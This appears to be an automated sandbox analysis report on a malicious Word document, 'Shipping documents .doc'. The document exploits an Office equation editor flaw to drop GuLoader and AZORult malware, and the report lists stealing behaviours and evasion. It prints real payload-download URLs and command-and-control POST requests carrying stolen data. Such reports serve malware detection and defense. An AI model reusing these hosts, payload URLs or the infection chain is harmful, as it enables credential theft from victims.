Loading ...

Play interactive tourEdit tour

Analysis Report Shipping documents .doc

Overview

General Information

Sample Name:Shipping documents .doc
Analysis ID:289457
MD5:c6e349221350923e221ecd8cb7a853fa
SHA1:8eac38325a53f7009c9db4e37c692e148b025151
SHA256:14eb827b600c3f7ccf2af766d0fec868e6b0467eba9264f19b75427f95ef7cfa
Tags:doc

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops certificate files (DER)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Searches for user specific document files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1960 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2396 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • jketxzi.exe (PID: 2328 cmdline: C:\Users\user\AppData\Roaming\jketxzi.exe MD5: F8B85F347A71A59F7F00AE7532F2C18B)
      • jketxzi.exe (PID: 1916 cmdline: C:\Users\user\AppData\Roaming\jketxzi.exe MD5: F8B85F347A71A59F7F00AE7532F2C18B)
  • EQNEDT32.EXE (PID: 2444 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: jketxzi.exe PID: 2328JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
    Process Memory Space: jketxzi.exe PID: 2328JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\jketxzi.exe, CommandLine: C:\Users\user\AppData\Roaming\jketxzi.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\jketxzi.exe, NewProcessName: C:\Users\user\AppData\Roaming\jketxzi.exe, OriginalFileName: C:\Users\user\AppData\Roaming\jketxzi.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2396, ProcessCommandLine: C:\Users\user\AppData\Roaming\jketxzi.exe, ProcessId: 2328
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 54.36.244.168, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2396, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2396, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\linkdo[1].exe

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus / Scanner detection for submitted sampleShow sources
      Source: Shipping documents .docAvira: detected
      Antivirus detection for URL or domainShow sources
      Source: http://www.radio80.eu/wp-content/plugins/louder/linkdo.exeAvira URL Cloud: Label: malware
      Multi AV Scanner detection for domain / URLShow sources
      Source: officestore.co.idVirustotal: Detection: 8%Perma Link
      Source: http://officestore.co.id/linkzer/PL341/index.phpVirustotal: Detection: 10%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\linkdo[1].exeVirustotal: Detection: 40%Perma Link
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\linkdo[1].exeReversingLabs: Detection: 25%
      Multi AV Scanner detection for submitted fileShow sources
      Source: Shipping documents .docVirustotal: Detection: 37%Perma Link
      Source: Shipping documents .docReversingLabs: Detection: 37%

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\jketxzi.exeJump to behavior
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: global trafficDNS query: name: www.radio80.eu
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.36.244.168:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.36.244.168:80

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49167 -> 54.36.244.168:80
      Source: TrafficSnort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49173 -> 103.247.10.55:80
      Source: TrafficSnort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 103.247.10.55:80 -> 192.168.2.22:49173
      Source: Joe Sandbox ViewIP Address: 103.247.10.55 103.247.10.55
      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
      Source: Joe Sandbox ViewASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID RUMAHWEB-AS-IDRumahwebIndonesiaCVID
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: global trafficHTTP traffic detected: GET /wp-content/plugins/louder/linkdo.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.radio80.euConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 103Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 3a 10 ef 26 66 9b 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 9c 47 13 8b 30 61 ec 45 70 9d 33 70 9d 35 Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p:&f&f&f&f&g&fG0aEp3p5
      Source: global trafficHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 41707Cache-Control: no-cache
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B09FC7D-537D-406E-B057-1B1541B1D39D}.tmpJump to behavior
      Source: global trafficHTTP traffic detected: GET /wp-content/plugins/louder/linkdo.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.radio80.euConnection: Keep-Alive
      Source: jketxzi.exe, 00000004.00000002.2087940759.0000000003150000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: unknownDNS traffic detected: queries for: www.radio80.eu
      Source: unknownHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 103Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 3a 10 ef 26 66 9b 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 9c 47 13 8b 30 61 ec 45 70 9d 33 70 9d 35 Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p:&f&f&f&f&g&fG0aEp3p5
      Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
      Source: mozglue.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: mozglue.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: mozglue.dll.5.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
      Source: mozglue.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: mozglue.dll.5.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: mozglue.dll.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: mozglue.dll.5.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
      Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: jketxzi.exe, 00000004.00000002.2087940759.0000000003150000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
      Source: jketxzi.exe, 00000004.00000002.2087940759.0000000003150000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
      Source: jketxzi.exe, 00000004.00000002.2088084586.0000000003337000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: jketxzi.exe, 00000004.00000002.2088084586.0000000003337000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: mozglue.dll.5.drString found in binary or memory: http://ocsp.digicert.com0C
      Source: mozglue.dll.5.drString found in binary or memory: http://ocsp.digicert.com0N
      Source: mozglue.dll.5.drString found in binary or memory: http://ocsp.thawte.com0
      Source: jketxzi.exe, 00000004.00000002.2088084586.0000000003337000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: mozglue.dll.5.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
      Source: mozglue.dll.5.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
      Source: mozglue.dll.5.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
      Source: jketxzi.exe, 00000004.00000002.2088084586.0000000003337000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: jketxzi.exe, 00000004.00000002.2087940759.0000000003150000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: jketxzi.exe, 00000004.00000002.2088084586.0000000003337000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: mozglue.dll.5.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
      Source: mozglue.dll.5.drString found in binary or memory: http://www.mozilla.com0
      Source: jketxzi.exe, 00000004.00000002.2087940759.0000000003150000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: jketxzi.exe, 00000004.00000002.2087940759.0000000003150000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: mozglue.dll.5.drString found in binary or memory: https://www.digicert.com/CPS0
      Source: 48349708493818193655002.tmp.5.drString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j0j46j0l2j46j0j5.485j0j8&sourceid=chro
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

      System Summary:

      barindex
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\jketxzi.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\linkdo[1].exeJump to dropped file
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D3B36 NtResumeThread,4_2_002D3B36
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D1554 NtWriteVirtualMemory,4_2_002D1554
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D3782 NtProtectVirtualMemory,4_2_002D3782
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D1709 NtWriteVirtualMemory,4_2_002D1709
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D026C NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_002D026C
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D3B4A NtResumeThread,4_2_002D3B4A
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D3A51 NtProtectVirtualMemory,4_2_002D3A51
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D0950 NtWriteVirtualMemory,4_2_002D0950
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D3753 NtProtectVirtualMemory,4_2_002D3753
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D3BA4 NtResumeThread,4_2_002D3BA4
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D3CB6 NtResumeThread,4_2_002D3CB6
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D20B1 NtWriteVirtualMemory,4_2_002D20B1
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D15B0 NtWriteVirtualMemory,4_2_002D15B0
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D1295 NtWriteVirtualMemory,4_2_002D1295
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeCode function: 4_2_002D10DB NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_002D10DB
      Source: api-ms-win-core-errorhandling-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-debug-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-datetime-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-console-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
      Source: jketxzi.exe, 00000004.00000002.2087940759.0000000003150000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
      Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winDOC@7/66@4/2
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ipping documents .docJump to behavior
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeMutant created: \Sessions\1\BaseNamedObjects\A8AD17B7C-343A2EC6-C0602CB5-39EA5133-2DF4BF06
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBE10.tmpJump to behavior
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: softokn3.dll.5.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
      Source: softokn3.dll.5.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
      Source: nss3.dll.5.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: softokn3.dll.5.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
      Source: nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
      Source: nss3.dll.5.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
      Source: softokn3.dll.5.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
      Source: nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
      Source: softokn3.dll.5.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
      Source: softokn3.dll.5.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
      Source: softokn3.dll.5.drBinary or memory string: SELECT ALL id FROM %s;
      Source: softokn3.dll.5.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
      Source: softokn3.dll.5.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
      Source: nss3.dll.5.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: nss3.dll.5.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
      Source: nss3.dll.5.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
      Source: nss3.dll.5.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: softokn3.dll.5.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
      Source: Shipping documents .docVirustotal: Detection: 37%
      Source: Shipping documents .docReversingLabs: Detection: 37%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\jketxzi.exe C:\Users\user\AppData\Roaming\jketxzi.exe
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\jketxzi.exe C:\Users\user\AppData\Roaming\jketxzi.exe
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\jketxzi.exe C:\Users\user\AppData\Roaming\jketxzi.exeJump to behavior
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeProcess created: C:\Users\user\AppData\Roaming\jketxzi.exe C:\Users\user\AppData\Roaming\jketxzi.exeJump to behavior
      Source: C:\Users\user\AppData\Roaming\jketxzi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: mozglue.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: nss3.dll.5.dr
      Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.5.dr
      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.5.dr
      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: api-ms-win-core-debug-l1-1-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.5.dr
      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.5.dr
      Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.5.dr
      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: mozglue.dll.5.dr
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: api-ms-win-core-errorhandling-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.5.dr
      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: api-ms-win-core-console-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: api-ms-win-core-file-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.5.dr
      Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.5.dr
      Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.5.dr
      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.5.dr
      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.5.dr
      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: api-ms-win-core-datetime-l1-1-0.dll.5.dr
